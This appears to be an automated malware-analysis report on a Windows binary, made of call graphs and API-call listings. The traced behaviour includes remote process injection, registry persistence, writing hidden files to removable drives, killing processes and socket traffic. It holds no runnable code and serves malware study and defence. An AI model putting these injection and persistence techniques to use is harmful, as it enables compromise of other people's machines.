8741->8759 8753 900c4b 8742->8753 8745->8729 8745->8739 8748 8fa75a 10 API calls 8747->8748 8749 903015 CreateFileA 8748->8749 8750 90303a WriteFile CloseHandle 8749->8750 8751 90305e 8749->8751 8750->8751 8751->8703 8752->8706 8754 900c6a lstrlen 8753->8754 8755 900c61 8754->8755 8756 900c8d CreateFileA 8754->8756 8755->8754 8757 900c87 8755->8757 8756->8757 8758 900caf WriteFile CloseHandle GetFileAttributesA 8756->8758 8757->8735 8758->8757 8760 9010d4 lstrcat 8759->8760 8761 9010ec 8759->8761 8760->8761 8762 901101 8761->8762 8763 901117 lstrcat FindFirstFileA 8761->8763 8762->8745 8764 901141 FindNextFileA 8763->8764 8765 901170 8763->8765 8764->8765 8766 901157 8764->8766 8767 901492 8765->8767 8770 90146f 8765->8770 8766->8764 8766->8765 8771 90117b Sleep 8766->8771 8772 90119f lstrlen 8766->8772 8778 9013aa lstrcpy lstrlen lstrcmpiA 8766->8778 8779 8fe329 48 API calls 8766->8779 8780 901060 71 API calls 8766->8780 8781 901355 8766->8781 8783 8fa26e 48 API calls 8766->8783 8785 9012f2 lstrcpy lstrcat 8766->8785 8768 9014b1 FindClose 8767->8768 8769 9014bb Sleep 8767->8769 8768->8769 8769->8762 8799 900e71 8770->8799 8771->8772 8772->8766 8773 9011c7 lstrcat lstrlen lstrlen 8772->8773 8773->8766 8775 901207 lstrcmpiA 8773->8775 8775->8766 8777 90121e lstrcmpiA 8775->8777 8777->8766 8778->8766 8779->8766 8780->8766 8781->8766 8784 90136a DeleteFileA 8781->8784 8786 900cf6 CreateFileA 8781->8786 8783->8766 8784->8781 8785->8766 8787 900d45 GetFileSize 8786->8787 8788 900e6a 8786->8788 8789 900e60 CloseHandle 8787->8789 8790 900d61 GlobalAlloc ReadFile 8787->8790 8788->8781 8789->8788 8791 900da1 8790->8791 8792 900e56 GlobalFree 8791->8792 8793 900dac CreateFileW 8791->8793 8792->8789 8793->8792 8794 900ddb GetFileSize 8793->8794 8795 900df3 GlobalAlloc ReadFile 8794->8795 8796 900e4c CloseHandle 8794->8796 8797 900e34 8795->8797 8796->8792 8798 900e42 GlobalFree 8797->8798 8798->8796 8800 908060 8799->8800 8801 900e7e lstrcpy 8800->8801 8802 900f03 8801->8802 8803 900f1a lstrlen 8801->8803 8818 8f44cb InterlockedExchange 8802->8818 8805 8fa16b 2 API calls 8803->8805 8807 900f34 lstrcat 8805->8807 8806 900f08 8806->8803 8808 900f4b 8806->8808 8809 900f76 MultiByteToWideChar CreateFileA 8807->8809 8819 8f44cb InterlockedExchange 8808->8819 8811 900fc1 lstrlenW 8809->8811 8812 901055 8809->8812 8820 90772b 8811->8820 8812->8767 8813 900f50 lstrcat 8813->8809 8815 900ff1 lstrlenW 8816 90772b 8815->8816 8817 901017 WriteFile CloseHandle 8816->8817 8817->8812 8818->8806 8819->8813 8821 907734 8820->8821 8821->8815 8821->8821 8823 908060 8822->8823 8824 901cf0 lstrcpy GetDriveTypeA 8823->8824 8825 901d60 8824->8825 8826 901d7e RtlExitUserThread 8824->8826 8827 901060 91 API calls 8825->8827 8828 901d7b 8827->8828 8828->8826 8830 901ea9 8829->8830 8831 901ee8 RtlExitUserThread 8830->8831 8874 901d8f RegOpenKeyExA 8830->8874 8833 901ebe Sleep 8834 901d8f 53 API calls 8833->8834 8835 901ed8 Sleep 8834->8835 8835->8830 8837 90308c 8836->8837 8883 8f44cb InterlockedExchange 8837->8883 8839 903162 Sleep 8840 902fff 13 API calls 8839->8840 8842 903188 8840->8842 8841 8fe329 48 API calls 8841->8842 8842->8841 8843 9031a7 Sleep 8842->8843 8848 9031b4 8842->8848 8843->8842 8844 903744 RtlExitUserThread 8846 902ebc 11 API calls 8847 90320b Sleep GetLogicalDrives 8846->8847 8847->8848 8848->8844 8848->8846 8849 903734 Sleep 8848->8849 8850 903278 GetDriveTypeA 8848->8850 8849->8848 8850->8848 8851 9032bc lstrcat CreateFileA 8850->8851 8852 903522 GetFileAttributesA 8851->8852 8853 9032ff GetFileTime FileTimeToSystemTime 8851->8853 8854 903569 CreateFileA 8852->8854 8855 90353e SetFileAttributesA DeleteFileA 8852->8855 8856 903515 CloseHandle 8853->8856 8871 90333d 8853->8871 8854->8848 8858 903598 GetSystemTime SystemTimeToFileTime 8854->8858 8921 8fa2ad SHFileOperation RemoveDirectoryA 8855->8921 8856->8852 8860 8fa16b 2 API calls 8858->8860 8859 903566 8859->8854 8866 903605 8860->8866 8861 903372 ReadFile CharLowerA lstrlen 8863 903509 8861->8863 8861->8871 8863->8856 8864 903633 lstrcat 8864->8866 8865 90361f lstrcat 8865->8866 8866->8864 8866->8865 8884 8f44cb InterlockedExchange 8866->8884 8885 902b8e 8866->8885 8868 903658 6 API calls 8868->8848 8869 9036ef WriteFile CloseHandle SetFileAttributesA 8868->8869 8869->8848 8870 903465 lstrcpy GetFileAttributesA 8870->8863 8872 903491 CloseHandle CreateFileA 8870->8872 8871->8856 8871->8861 8871->8863 8871->8870 8872->8863 8873 9034c9 WriteFile CloseHandle SetFileAttributesA 8872->8873 8873->8863 8875 901de5 RegEnumValueA 8874->8875 8876 901e89 RegCloseKey 8874->8876 8877 901e29 8875->8877 8878 901e34 8875->8878 8876->8833 8877->8878 8879 901e36 GetFileAttributesA 8877->8879 8878->8876 8880 901e48 8879->8880 8881 8fe329 48 API calls 8880->8881 8882 901e5f Sleep 8880->8882 8881->8880 8882->8875 8882->8876 8883->8839 8884->8866 8886 902c23 8885->8886 8922 8f44cb InterlockedExchange 8886->8922 8888 902c2b 8889 902c49 lstrcat 8888->8889 8923 902a35 lstrlen 8888->8923 8944 8f44cb InterlockedExchange 8889->8944 8892 902c46 8892->8889 8893 902c5e 8894 902c79 8893->8894 8895 902a35 10 API calls 8893->8895 8896 902e04 8894->8896 8897 902ca4 8894->8897 8895->8894 8953 8f44cb InterlockedExchange 8896->8953 8945 8f44cb InterlockedExchange 8897->8945 8900 902e09 8901 902a35 10 API calls 8900->8901 8902 902e24 8900->8902 8901->8902 8902->8868 8903 902dff 8903->8868 8904 902ca9 8904->8903 8946 8f44cb InterlockedExchange 8904->8946 8906 902cf4 8907 902d12 lstrcpy 8906->8907 8908 902a35 10 API calls 8906->8908 8947 902962 8907->8947 8910 902d0f 8908->8910 8910->8907 8911 902d44 8912 902dee lstrcat 8911->8912 8951 8f44cb InterlockedExchange 8911->8951 8912->8903 8914 902d68 8915 902d7a lstrcat 8914->8915 8916 902d8c lstrcat 8914->8916 8915->8916 8952 8f44cb InterlockedExchange 8916->8952 8918 902da3 8919 902db5 lstrcat 8918->8919 8920 902dc7 lstrlen wsprintfA 8918->8920 8919->8920 8920->8912 8921->8859 8922->8888 8954 8f44cb InterlockedExchange 8923->8954 8925 902a61 8926 902a82 8925->8926 8927 902a73 lstrcat 8925->8927 8955 8f44cb InterlockedExchange 8926->8955 8927->8926 8929 902a87 8930 902aa8 lstrcat 8929->8930 8931 902a99 lstrcat 8929->8931 8956 8f44cb InterlockedExchange 8930->8956 8931->8930 8933 902abc 8957 8f44cb InterlockedExchange 8933->8957 8935 902b6e 8936 902962 InterlockedExchange 8935->8936 8937 902b77 lstrcat 8936->8937 8937->8892 8938 902b08 lstrlen 8939 8fa16b 2 API calls 8938->8939 8942 902aca 8939->8942 8940 8f44cb InterlockedExchange 8940->8942 8941 902b37 lstrcat 8941->8942 8942->8935 8942->8938 8942->8940 8942->8941 8943 902b5d lstrcat 8942->8943 8943->8942 8944->8893 8945->8904 8946->8906 8950 902976 8947->8950 8948 902a31 8948->8911 8949 8f44cb InterlockedExchange 8949->8950 8950->8948 8950->8949 8951->8914 8952->8918 8953->8900 8954->8925 8955->8929 8956->8933 8957->8942 8959 8f8fae 8958->8959 8960 8f90b5 8958->8960 8961 8f8fbc RegEnumValueA 8959->8961 8962 8f8ff3 8959->8962 8963 8f8ff5 RegDeleteValueA 8959->8963 8960->7933 8961->8959 8961->8962 8964 8f901d RegEnumKeyExA 8962->8964 8966 8f9052 wsprintfA 8962->8966 8967 8f9050 8962->8967 8968 8f9084 RegDeleteKeyA 8962->8968 8963->8961 8964->8962 8965 8f90ab RegCloseKey 8964->8965 8965->8960 8966->8962 8967->8965 8968->8964 8970 8f9354 lstrcat lstrcat 8969->8970 8971 8f9342 lstrcat 8969->8971 8972 8f938a 8970->8972 8971->8970 8972->7955 8974 8f91ae 8973->8974 8975 8f91b5 CloseHandle 8973->8975 8974->8975 8975->7961 8977 8f9258 8976->8977 8978 8f92d9 SetFileAttributesA DeleteFileA 8977->8978 8978->7962 8980 8f978e lstrcat 8979->8980 8981 8f97a0 8979->8981 8980->8981 8982 8f97c4 GlobalAlloc 8981->8982 8985 8f97f6 8981->8985 8983 8f97f1 8982->8983 8984 8f9805 lstrcat 8983->8984 8983->8985 8986 8fa75a 10 API calls 8984->8986 8985->7935 8985->7970 8987 8f984d CopyFileA 8986->8987 8988 8f986a LoadLibraryExA 8987->8988 8989 8f9881 8987->8989 8988->8989 8990 8f988a LoadLibraryExA 8989->8990 8991 8f98b1 GlobalFree GetProcAddress 8989->8991 8990->8985 8990->8991 8991->8985 8992 8f98e7 8991->8992 8992->8985 8993 8f9997 GlobalAlloc 8992->8993 8994 8f99d1 CreateFileA 8993->8994 8994->8985 8996 8f9a62 WriteFile CloseHandle GlobalFree FreeLibrary 8994->8996 8996->8985 8997 8f9ab8 DeleteFileA 8996->8997 8997->8985 8999 8f9ec1 8998->8999 9000 8f9edc RtlExitUserThread 8999->9000 9011 8f9c4f CreateToolhelp32Snapshot 8999->9011 9002 8f9ecf Sleep 9002->8999 9009 8f944d 9003->9009 9004 8f9459 Sleep 9004->9009 9005 8f94c7 RtlExitUserThread 9006 8f94ba Sleep 9006->9009 9007 8f948a lstrlen 9007->9006 9007->9009 9009->9004 9009->9005 9009->9006 9009->9007 9010 8f946d Sleep 9009->9010 9010->9009 9012 8f9eac CloseHandle 9011->9012 9013 8f9cac Process32First 9011->9013 9012->9002 9014 8f9cea CharUpperA 9013->9014 9015 8f9db8 Process32Next 9013->9015 9023 8f9d03 9014->9023 9015->9012 9016 8f9dd3 CharUpperA 9015->9016 9028 8f9df2 9016->9028 9017 8f9d71 9017->9015 9036 8f9b56 CreateToolhelp32Snapshot Module32First 9017->9036 9018 8f9b56 5 API calls 9018->9028 9020 8f9d8b 9020->9015 9026 8f9acf 6 API calls 9020->9026 9022 8f9acf 6 API calls 9025 8f9e11 Sleep 9022->9025 9023->9017 9031 8f9acf CreateFileA 9023->9031 9025->9015 9027 8f9d9e Sleep 9026->9027 9027->9015 9028->9015 9028->9018 9028->9022 9029 8f9acf 6 API calls 9028->9029 9030 8f9e89 Sleep 9029->9030 9030->9028 9032 8f9b32 WriteFile CloseHandle 9031->9032 9033 8f9b00 OpenProcess 9031->9033 9035 8f9b30 Sleep 9032->9035 9034 8f9b1a TerminateProcess CloseHandle 9033->9034 9033->9035 9034->9035 9035->9017 9037 8f9c37 CloseHandle 9036->9037 9040 8f9bce 9036->9040 9037->9020 9038 8f9bd7 CharUpperA 9038->9040 9039 8f9c20 Module32Next 9039->9037 9039->9040 9040->9038 9040->9039 9041 8f9c14 9040->9041 9041->9037 9043 90276d CloseHandle 9042->9043 9044 90255d Process32First 9042->9044 9043->7980 9045 902591 9044->9045 9046 90266f Process32Next 9044->9046 9045->9046 9048 90259e lstrlen 9045->9048 9046->9043 9047 90268a 9046->9047 9047->9046 9051 902697 lstrlen 9047->9051 9060 901ef6 9047->9060 9049 9025b0 lstrcpyn 9048->9049 9050 9025c8 lstrcpy 9048->9050 9052 9025dc 7 API calls 9049->9052 9050->9052 9053 9026c1 lstrcpy 9051->9053 9054 9026a9 lstrcpyn 9051->9054 9052->9046 9055 902659 9052->9055 9056 9026d5 7 API calls 9053->9056 9054->9056 9057 901ef6 38 API calls 9055->9057 9056->9047 9058 90266c 9057->9058 9058->9046 9061 908060 9060->9061 9062 901f20 OpenProcess 9061->9062 9063 9021a7 OpenProcessToken 9062->9063 9064 901ffa GetLastError 9062->9064 9065 9021cd GetTokenInformation 9063->9065 9067 902042 9063->9067 9066 902009 GetVersionExA 9064->9066 9064->9067 9065->9067 9069 9021f7 GetLastError 9065->9069 9066->9067 9068 90204e GetCurrentThread OpenThreadToken 9066->9068 9070 9024b4 CloseHandle 9067->9070 9071 9024cb 9067->9071 9072 9020b3 LookupPrivilegeValueA AdjustTokenPrivileges 9068->9072 9073 902074 GetLastError 9068->9073 9069->9067 9074 90220e GetProcessHeap RtlAllocateHeap 9069->9074 9070->9071 9077 9024e1 9071->9077 9078 9024d4 CloseHandle 9071->9078 9075 902105 CloseHandle 9072->9075 9076 90211e GetLastError 9072->9076 9073->9067 9079 90208d GetCurrentProcess OpenProcessToken 9073->9079 9074->9067 9080 90223f GetTokenInformation 9074->9080 9075->9067 9082 902144 OpenProcess AdjustTokenPrivileges CloseHandle 9076->9082 9083 90212b CloseHandle 9076->9083 9084 902500 9077->9084 9085 9024ea GetProcessHeap HeapFree 9077->9085 9078->9077 9079->9067 9079->9072 9080->9067 9081 902273 LookupAccountSidA 9080->9081 9081->9067 9086 9022c7 9081->9086 9082->9067 9087 902199 9082->9087 9083->9067 9084->9047 9085->9084 9086->9067 9088 9022d2 lstrcmpiA 9086->9088 9087->9063 9089 902314 CreateMutexA 9088->9089 9090 9022e8 lstrcmpiA 9088->9090 9089->9067 9090->9089 9091 9022fe lstrcmpiA 9090->9091 9091->9089 9092 90232e VirtualAllocEx 9091->9092 9094 902366 WriteProcessMemory 9092->9094 9095 9023cd VirtualAllocEx 9092->9095 9094->9067 9097 902398 CreateRemoteThread 9094->9097 9095->9067 9096 9023fb 9095->9096 9099 90240e lstrlen 9096->9099 9097->9067 9098 9023c6 9097->9098 9098->9095 9100 90772b 9099->9100 9101 90242c WriteProcessMemory 9100->9101 9101->9067 9102 902460 CreateRemoteThread 9101->9102 9102->9067 9104 908060 9103->9104 9105 8f84ce InterlockedIncrement htons 9104->9105 9106 8f857b 9105->9106 9123 8f719b 9106->9123 9109 8f86ba 9115 8f86e5 InterlockedDecrement RtlExitUserThread 9109->9115 9110 8f85a2 GetTickCount 9111 8f85de 9110->9111 9112 8f85f5 9110->9112 9113 8f719b 38 API calls 9111->9113 9114 8f8651 9112->9114 9116 8f862a 9112->9116 9138 8f7f11 htons 9112->9138 9113->9112 9117 8f8673 9114->9117 9156 8f7523 9114->9156 9116->9114 9144 8f82b6 htons 9116->9144 9119 8f86b5 9117->9119 9168 8f6ebe 9117->9168 9119->9115 9124 908060 9123->9124 9125 8f71a8 socket 9124->9125 9126 8f721c 9125->9126 9136 8f734f 9125->9136 9129 8f6981 InterlockedExchange 9126->9129 9127 8f7506 closesocket 9128 8f7513 9127->9128 9128->9109 9128->9110 9130 8f723a 9129->9130 9131 8f7250 sendto 9130->9131 9130->9136 9132 8f727c select 9131->9132 9131->9136 9134 8f7354 recvfrom 9132->9134 9132->9136 9135 8f738d 9134->9135 9134->9136 9135->9136 9137 8f6330 32 API calls 9135->9137 9136->9127 9136->9128 9137->9136 9139 8f7f5f 9138->9139 9183 8f7c4e socket 9139->9183 9142 8f7f7c send 9143 8f7f9b closesocket 9142->9143 9143->9116 9145 8f8336 9144->9145 9199 8f44cb InterlockedExchange 9145->9199 9147 8f833e GetTickCount 9148 8f7c4e 10 API calls 9147->9148 9149 8f8368 9148->9149 9150 8f837a send 9149->9150 9155 8f83a2 9149->9155 9151 8f8394 9150->9151 9150->9155 9200 8f811c 9151->9200 9152 8f83c4 9152->9114 9154 8f83b7 closesocket 9154->9152 9155->9152 9155->9154 9157 908060 9156->9157 9158 8f7530 socket 9157->9158 9159 8f6981 InterlockedExchange 9158->9159 9160 8f759e 9159->9160 9161 8f76b3 9160->9161 9162 8f75b4 sendto 9160->9162 9163 8f776e 9161->9163 9164 8f7761 closesocket 9161->9164 9162->9161 9165 8f75e0 select 9162->9165 9163->9117 9164->9163 9165->9161 9167 8f76b8 recvfrom 9165->9167 9167->9161 9169 908060 9168->9169 9170 8f6ecb socket 9169->9170 9171 8f6f35 9170->9171 9179 8f705c 9170->9179 9172 8f6981 InterlockedExchange 9171->9172 9175 8f6f47 9172->9175 9173 8f717e closesocket 9174 8f718b 9173->9174 9174->9119 9176 8f6f5d sendto 9175->9176 9175->9179 9177 8f6f89 select 9176->9177 9176->9179 9177->9179 9180 8f7061 recvfrom 9177->9180 9179->9173 9179->9174 9180->9179 9181 8f709a 9180->9181 9181->9179 9182 8f5e86 2 API calls 9181->9182 9182->9179 9184 8f7c98 9183->9184 9185 8f7ca1 9183->9185 9184->9185 9186 8f7ca8 ioctlsocket 9184->9186 9185->9142 9185->9143 9187 8f7cde connect 9186->9187 9188 8f7d05 WSAGetLastError 9187->9188 9189 8f7d00 9187->9189 9190 8f7d1d Sleep 9188->9190 9194 8f7d27 9188->9194 9192 8f7ec9 ioctlsocket 9189->9192 9190->9187 9191 8f7d35 closesocket 9191->9185 9192->9185 9194->9191 9195 8f7e58 select 9194->9195 9195->9191 9196 8f7e8e 9195->9196 9196->9191 9197 8f7e99 __WSAFDIsSet 9196->9197 9197->9191 9198 8f7eb0 __WSAFDIsSet 9197->9198 9198->9191 9198->9192 9199->9147 9215 8f7fa9 9200->9215 9203 8f824f 9206 8f8255 send 9203->9206 9213 8f824d 9203->9213 9204 8f8289 9204->9155 9205 8f8192 GlobalAlloc 9208 8f81c2 9205->9208 9206->9213 9207 8f827f closesocket 9207->9204 9209 8f81d7 recv 9208->9209 9210 8f8204 9208->9210 9209->9208 9209->9210 9211 8f8234 9210->9211 9212 8f6330 32 API calls 9210->9212 9211->9213 9214 8f8240 GlobalFree 9211->9214 9212->9211 9213->9204 9213->9207 9214->9213 9218 8f7fd3 9215->9218 9216 8f80e4 9216->9203 9216->9205 9216->9213 9217 8f80e6 recv 9217->9216 9218->9216 9218->9217 9219 8f809c select 9218->9219 9219->9216 9219->9217 9221 8f811c 39 API calls 9220->9221 9222 8f82a3 RtlExitUserThread 9221->9222 9224 8f7a1f GlobalFree RtlExitUserThread 9223->9224 9225 8f77b5 9223->9225 9225->9224 9226 8f78ff 9225->9226 9227 8f7824 9225->9227 9228 8f790b 9226->9228 9236 8f794b 9226->9236 9229 8f784f htons 9227->9229 9230 8f6981 InterlockedExchange 9228->9230 9231 8f719b 38 API calls 9229->9231 9232 8f791a 9230->9232 9234 8f7875 9231->9234 9235 8f7926 sendto 9232->9235 9255 8f78f7 9232->9255 9233 8f7999 9237 8f79a7 9233->9237 9238 8f79e4 9233->9238 9240 8f787c 9234->9240 9241 8f7895 9234->9241 9235->9255 9236->9224 9236->9233 9250 8f6330 32 API calls 9236->9250 9239 8f6981 InterlockedExchange 9237->9239 9242 8f6981 InterlockedExchange 9238->9242 9243 8f79b6 9239->9243 9244 8f6981 InterlockedExchange 9240->9244 9246 8f6981 InterlockedExchange 9241->9246 9245 8f79f3 9242->9245 9247 8f79c2 sendto 9243->9247 9243->9255 9248 8f788d 9244->9248 9245->9224 9249 8f79ff sendto 9245->9249 9246->9248 9247->9255 9251 8f78d0 9248->9251 9252 8f78b0 sendto 9248->9252 9249->9224 9250->9233 9253 8f78d6 htons 9251->9253 9251->9255 9252->9251 9254 8f5e86 2 API calls 9253->9254 9254->9255 9255->9224 9493 97eaec 9494 97eb65 _controlfp 9493->9494 9496 97eb04 9493->9496 9495 97eb90 9494->9495 9501 97ec57 _controlfp 9495->9501 9496->9494 9496->9495 9498 97ebae 9506 97e87f 9498->9506 9500 97ebc2 exit 9502 97ef09 9501->9502 9503 97efd0 __common_dcos_data fclose 9502->9503 9504 97ef27 __common_dcos_data 9503->9504 9505 97ef3b exit 9504->9505 9505->9498 9509 97ea99 9506->9509 9507 97eb65 _controlfp 9508 97eb90 9507->9508 9510 97ec57 __common_dcos_data 3 API calls 9508->9510 9509->9507 9509->9508 9511 97ebae 9510->9511 9512 97e87f __common_dcos_data 3 API calls 9511->9512 9513 97ebc2 exit 9512->9513 9513->9500 9514 8f88f3 9515 8f890a inet_addr 9514->9515 9518 8f8906 9514->9518 9516 8f892e gethostbyname 9515->9516 9517 8f891d 9515->9517 9516->9518 9517->9516 9517->9518 9718 8f8bf1 9721 8f8a39 9718->9721 9719 8f8d8d Sleep 9719->9721 9720 8f8da5 Sleep 9720->9721 9721->9719 9721->9720 9722 8f8cae lstrcpy 9721->9722 9723 8f8db5 RtlExitUserThread 9721->9723 9724 8f8bab Sleep 9721->9724 9726 8fa75a 10 API calls 9721->9726 9727 900945 18 API calls 9721->9727 9728 9014d9 28 API calls 9721->9728 9729 8f8b2a IsBadWritePtr 9721->9729 9730 8f45d2 4 API calls 9721->9730 9731 8f4631 3 API calls 9721->9731 9722->9721 9724->9721 9726->9721 9727->9721 9728->9721 9729->9721 9730->9721 9732 8f8b86 Sleep 9731->9732 9732->9721

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 903b60-903c26 call 908060 call 902ebc LoadLibraryA 5 903c72-903c8c LoadLibraryA 0->5 6 903c28-903c6d GetProcAddress * 3 0->6 7 903cf1-903d13 RegOpenKeyExA 5->7 8 903c8e-903cec GetProcAddress * 4 5->8 6->5 9 903d15-903d47 RegSetValueExA RegCloseKey 7->9 10 903d4d-903d6f RegOpenKeyExA 7->10 8->7 9->10 11 903d71-903da3 RegSetValueExA RegCloseKey 10->11 12 903da9-903df2 lstrcpy lstrcat RegOpenKeyExA 10->12 11->12 13 903df4-903e59 GetModuleFileNameA wsprintfA lstrlen RegSetValueExA RegCloseKey 12->13 14 903e5f-903e81 RegOpenKeyExA 12->14 13->14 15 903f15-903f3a GetWindowsDirectoryA lstrlen 14->15 16 903e87-903f0f RegSetValueExA * 3 RegCloseKey 14->16 17 903f4c-903f7a GetComputerNameA lstrlen 15->17 18 903f3c-903f46 lstrcat 15->18 16->15 19 903fc9-904007 lstrcpy GetUserNameA lstrlen 17->19 20 903f7c-903fc2 lstrlen 17->20 18->17 21 904009-904017 lstrcpy 19->21 22 90401d-90403d call 90772b 19->22 20->19 21->22 25 90404e-904061 lstrlen 22->25 26 9040e1-9040f0 call 900b9a 25->26 27 904063-90406a 25->27 34 9040f2-904117 GetTempPathA lstrlen 26->34 35 90414d-904157 lstrcpy 26->35 27->26 28 90406c-904099 27->28 30 9040aa-9040dc lstrlen 28->30 31 90409b-9040a4 28->31 30->25 31->30 36 904129-904138 call 900b9a 34->36 37 904119-904123 lstrcat 34->37 38 90415d-904167 35->38 46 90413a-904145 lstrcpy 36->46 47 90414b 36->47 37->36 39 904178-90418b lstrlen 38->39 41 904205-904250 lstrcat CreateFileMappingA call 8f477f call 8f6274 call 8f5760 call 8f5c26 39->41 42 90418d-904194 39->42 58 904331-904338 call 8f5760 41->58 59 904256-90429b call 8fc89a 41->59 42->41 44 904196-9041ca 42->44 48 9041db-904200 lstrlen 44->48 49 9041cc-9041d5 44->49 46->47 47->38 48->39 49->48 64 90433b-90435f call 8f8701 call 8f4d96 call 8f55be lstrlen 58->64 65 9042ac-9042b6 59->65 82 904361 call 8fa553 64->82 83 904366-904389 64->83 67 904325-904327 call 8f5760 65->67 68 9042b8-9042e7 65->68 75 90432c-90432f 67->75 70 9042e9-9042f7 68->70 71 90431e 68->71 70->71 74 9042f9-904320 call 8f5e86 70->74 71->67 74->65 75->64 82->83 86 904397-9043c3 call 8f44cb GetTickCount wsprintfA 83->86 87 90438b-904395 83->87 88 9043c6 86->88 87->86 87->88 90 9043d0-9043e0 88->90 92 9043e6-9043f6 90->92 93 9044aa-9044e3 lstrcat GetSystemDirectoryA lstrlen 90->93 92->93 94 9043fc-90440b 92->94 95 9044f5-904566 lstrcat * 2 GlobalAlloc * 2 93->95 96 9044e5-9044ef lstrcat 93->96 94->93 97 904411-904447 94->97 96->95 99 904457 97->99 100 904449-904455 97->100 101 904461-9044a1 lstrlen wsprintfA 99->101 100->101 102 9044a3 101->102 103 9044a5 101->103 102->93 103->90
                                                                                                            APIs
                                                                                                              • Part of subcall function 00902EBC: RegOpenKeyExA.KERNEL32(80000001,008F244C,00000000,000F003F,?,?), ref: 00902F03
                                                                                                              • Part of subcall function 00902EBC: RegSetValueExA.KERNELBASE(?,008F2488,00000000,00000004,00000002,00000004), ref: 00902F31
                                                                                                              • Part of subcall function 00902EBC: RegCloseKey.KERNEL32(?), ref: 00902F3E
                                                                                                              • Part of subcall function 00902EBC: lstrcpy.KERNEL32(00000000,008F2550), ref: 00902F99
                                                                                                              • Part of subcall function 00902EBC: lstrcat.KERNEL32(00000000,008F2548), ref: 00902FAC
                                                                                                            • LoadLibraryA.KERNEL32(008F2154), ref: 00903C13
                                                                                                            • GetProcAddress.KERNEL32(00000000,008F278C), ref: 00903C36
                                                                                                            • GetProcAddress.KERNEL32(00000000,008F27A0), ref: 00903C4E
                                                                                                            • GetProcAddress.KERNEL32(00000000,008F27B0), ref: 00903C67
                                                                                                            • LoadLibraryA.KERNEL32(008F2894), ref: 00903C79
                                                                                                            • GetProcAddress.KERNEL32(00000000,008F28D8), ref: 00903C9C
                                                                                                            • GetProcAddress.KERNEL32(00000000,008F28B0), ref: 00903CB5
                                                                                                            • GetProcAddress.KERNEL32(00000000,008F28C4), ref: 00903CCD
                                                                                                            • GetProcAddress.KERNEL32(00000000,008F28A0), ref: 00903CE6
                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,008F21D4,00000000,000F003F,00000000), ref: 00903D0B
                                                                                                            • RegSetValueExA.KERNEL32(00000000,008F21C0,00000000,00000004,00000000,00000004), ref: 00903D3A
                                                                                                            • RegCloseKey.KERNEL32(00000000), ref: 00903D47
                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,008F22EC,00000000,000F003F,00000000), ref: 00903D67
                                                                                                            • RegSetValueExA.KERNEL32(00000000,008F2328,00000000,00000004,00000000,00000004), ref: 00903D96
                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00903DA3
                                                                                                            • lstrcpy.KERNEL32(00000000,008F2384), ref: 00903DB7
                                                                                                            • lstrcat.KERNEL32(00000000,008F242C), ref: 00903DCA
                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,00000000,00000000,000F003F,00000000), ref: 00903DEA
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000200), ref: 00903E02
                                                                                                            • wsprintfA.USER32 ref: 00903E1C
                                                                                                            • lstrlen.KERNEL32(?), ref: 00903E2C
                                                                                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 00903E4C
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00903E59
                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,008F2384,00000000,000F003F,00000000), ref: 00903E79
                                                                                                            • RegSetValueExA.KERNELBASE(00000000,008F274C,00000000,00000004,00000000,00000004), ref: 00903EAC
                                                                                                            • RegSetValueExA.KERNELBASE(00000000,008F275C,00000000,00000004,00000000,00000004), ref: 00903ED7
                                                                                                            • RegSetValueExA.KERNEL32(00000000,008F2774,00000000,00000004,00000001,00000004), ref: 00903F02
                                                                                                            • RegCloseKey.KERNEL32(00000000), ref: 00903F0F
                                                                                                              • Part of subcall function 00900B9A: lstrcpy.KERNEL32(?,?), ref: 00900BC8
                                                                                                              • Part of subcall function 00900B9A: GetTickCount.KERNEL32 ref: 00900BCE
                                                                                                              • Part of subcall function 00900B9A: lstrlen.KERNEL32(?,008F3D08,00000000), ref: 00900BE1
                                                                                                              • Part of subcall function 00900B9A: wsprintfA.USER32 ref: 00900BEF
                                                                                                              • Part of subcall function 00900B9A: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000020,00000000), ref: 00900C0E
                                                                                                              • Part of subcall function 00900B9A: CloseHandle.KERNEL32(?), ref: 00900C2A
                                                                                                              • Part of subcall function 00900B9A: DeleteFileA.KERNEL32(?), ref: 00900C37
                                                                                                            • GetWindowsDirectoryA.KERNEL32(C:\Windows\,00000104), ref: 00903F1F
                                                                                                            • lstrlen.KERNEL32(C:\Windows\), ref: 00903F2A
                                                                                                            • lstrcat.KERNEL32(C:\Windows\,008F3E20), ref: 00903F46
                                                                                                            • GetComputerNameA.KERNEL32(00000000,00000080), ref: 00903F64
                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00903F71
                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00903F8F
                                                                                                            • lstrcpy.KERNEL32(Software\Msoga,Software\), ref: 00903FD3
                                                                                                            • GetUserNameA.ADVAPI32(00000000,00000080), ref: 00903FF1
                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00903FFE
                                                                                                            • lstrcpy.KERNEL32(00000000,008F2364), ref: 00904017
                                                                                                            • lstrlen.KERNEL32(?), ref: 00904055
                                                                                                            • lstrlen.KERNEL32(Software\Msoga), ref: 009040D0
                                                                                                            • GetTempPathA.KERNEL32(000000E4,C:\Windows\npqqe.log), ref: 009040FC
                                                                                                            • lstrlen.KERNEL32(C:\Windows\npqqe.log), ref: 00904107
                                                                                                            • lstrcat.KERNEL32(C:\Windows\npqqe.log,008F3E30), ref: 00904123
                                                                                                            • lstrcpy.KERNEL32(C:\Windows\npqqe.log,008F2100), ref: 00904145
                                                                                                            • lstrcpy.KERNEL32(C:\Windows\npqqe.log,C:\Windows\), ref: 00904157
                                                                                                            • lstrlen.KERNEL32(?), ref: 0090417F
                                                                                                            • lstrlen.KERNEL32(C:\Windows\npqqe.log), ref: 009041F4
                                                                                                            • lstrcat.KERNEL32(C:\Windows\npqqe.log,008F266C), ref: 00904211
                                                                                                            • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00015400,008F2370), ref: 0090422A
                                                                                                            • lstrlen.KERNEL32(44775622570), ref: 00904357
